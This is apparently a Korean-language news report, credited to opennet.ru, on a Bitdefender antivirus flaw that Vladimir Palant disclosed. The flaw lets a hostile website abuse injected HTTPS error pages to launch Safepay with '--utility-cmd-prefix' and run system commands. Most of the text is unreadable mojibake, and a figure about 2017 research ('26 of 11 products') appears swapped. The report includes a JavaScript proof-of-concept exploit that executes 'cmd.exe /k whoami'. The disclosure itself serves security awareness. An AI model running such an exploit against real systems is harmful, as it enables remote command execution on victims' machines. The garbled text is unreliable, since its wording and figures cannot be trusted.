Adblock Plus์ ์ฐฝ์์์ธ Vladimir Palant๋
๋ฌธ์ ์ ์์ธ์ Bitdefender ๋ฐ์ด๋ฌ์ค ๋ฐฑ์ ์ด ์ฌ์ดํธ์ ์๋ TLS ์ธ์ฆ์๋ฅผ ๊ต์ฒดํ์ฌ HTTPS ํธ๋ํฝ์ ๋ก์ปฌ ์ฐจ๋จ์ ์ํํ๋ค๋ ๊ฒ์ ๋๋ค. ํด๋ผ์ด์ธํธ ์์คํ ์ ์ถ๊ฐ ๋ฃจํธ ์ธ์ฆ์๊ฐ ์ค์น๋์ด ์ฌ์ฉ๋๋ ๊ตํต ๊ฒ์ฌ ์์คํ ์ ์๋์ ์จ๊ธธ ์ ์์ต๋๋ค. ๋ฐ์ด๋ฌ์ค ๋ฐฑ์ ์ ๋ณดํธ๋ ํธ๋ํฝ์ ์ค์ค๋ก๋ฅผ ์ฝ์ ํ๊ณ ์ผ๋ถ ํ์ด์ง์ ์์ฒด JavaScript ์ฝ๋๋ฅผ ์ฝ์ ํ์ฌ ์์ ๊ฒ์ ๊ธฐ๋ฅ์ ๊ตฌํํ๋ฉฐ, ๋ณด์ ์ฐ๊ฒฐ ์ธ์ฆ์์ ๋ฌธ์ ๊ฐ ์๋ ๊ฒฝ์ฐ ๋ฐํ๋ ์ค๋ฅ ํ์ด์ง๋ฅผ ์์ฒด์ ์ผ๋ก ๋์ฒดํฉ๋๋ค. ์ด๋ ค ์๋ ์๋ฒ๋ฅผ ๋์ ํ์ฌ ์ ์ค๋ฅ ํ์ด์ง๊ฐ ์ ๊ณต๋๋ฏ๋ก ํด๋น ์๋ฒ์ ๋ค๋ฅธ ํ์ด์ง๋ Bitdefender๊ฐ ์ฝ์ ํ ์ฝํ ์ธ ์ ๋ํ ์ ์ฒด ์ก์ธ์ค ๊ถํ์ ๊ฐ์ต๋๋ค.
๊ณต๊ฒฉ์๊ฐ ์ ์ดํ๋ โโ์ฌ์ดํธ๋ฅผ ์ด๋ฉด ํด๋น ์ฌ์ดํธ๋ XMLHttpRequest๋ฅผ ๋ณด๋ด๊ณ ์๋ตํ ๋ HTTPS ์ธ์ฆ์์ ๋ฌธ์ ๊ฐ ์๋ ์ฒํ ์ ์์ผ๋ฉฐ, ์ด๋ก ์ธํด Bitdefender๊ฐ ์คํธํํ ์ค๋ฅ ํ์ด์ง๊ฐ ๋ฐํ๋ฉ๋๋ค. ์ค๋ฅ ํ์ด์ง๋ ๊ณต๊ฒฉ์์ ๋๋ฉ์ธ ์ปจํ ์คํธ์์ ์ด๋ฆฌ๋ฏ๋ก Bitdefender ๋งค๊ฐ๋ณ์๋ฅผ ์ฌ์ฉํ์ฌ ์คํธํ๋ ํ์ด์ง์ ๋ด์ฉ์ ์ฝ์ ์ ์์ต๋๋ค. Bitdefender์์ ์ ๊ณตํ๋ ํ์ด์ง์๋ ๋ด๋ถ Bitdefender API๋ฅผ ์ฌ์ฉํ์ฌ ๋ณ๋์ Safepay ๋ธ๋ผ์ฐ์ ์ธ์ ์ ์์ํ๊ณ ์์์ ๋ช ๋ น์ค ํ๋๊ทธ๋ฅผ ์ง์ ํ๊ณ "--utility-cmd-prefix"๋ฅผ ์ฌ์ฉํ์ฌ ์์คํ ๋ช ๋ น์ ์์ํ ์ ์๋ ์ธ์ ํค๋ ํฌํจ๋์ด ์์ต๋๋ค. ๊น๋ฐ. ์ต์คํ๋ก์์ ์(param1 ๋ฐ param2๋ ์ค๋ฅ ํ์ด์ง์์ ์ป์ ๊ฐ์ ๋๋ค):
var ์์ฒญ = ์๋ก์ด XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader(ยซBDNDSS_B67EA559F21B487F861FDA8A44F01C50ยป, param1);
request.setRequestHeader(ยซBDNDCA_BBACF84D61A04F9AA66019A14B035478ยป, param2);
request.setRequestHeader(ยซBDNDWB_5056E556833D49C1AF4085CB254FC242ยป, ยซobk.runยป);
request.setRequestHeader(ยซBDNDOK_4E961A95B7B44CBCA1907D3D3643370Dยป, location.href);
request.send("data:text/html,nada โutility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
2017๋
์ ์ค์๋ ์ฐ๊ตฌ๋ฅผ ๊ธฐ์ตํด ๋ณด์.
11๊ฐ ์ ํ ์ค 26๊ฐ ์ ํ๋ง์ด ํ์ฌ ์ํธํ ์ ํ๊ตฐ์ ์ ๊ณตํ์ต๋๋ค. 5๊ฐ์ ์์คํ
์ด ์ธ์ฆ์๋ฅผ ํ์ธํ์ง ์์์ต๋๋ค(Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Kaspersky Internet Security ๋ฐ Total Security ์ ํ์ด ๊ณต๊ฒฉ์ ๋ฐ์์ต๋๋ค.
์ถ์ฒ : opennet.ru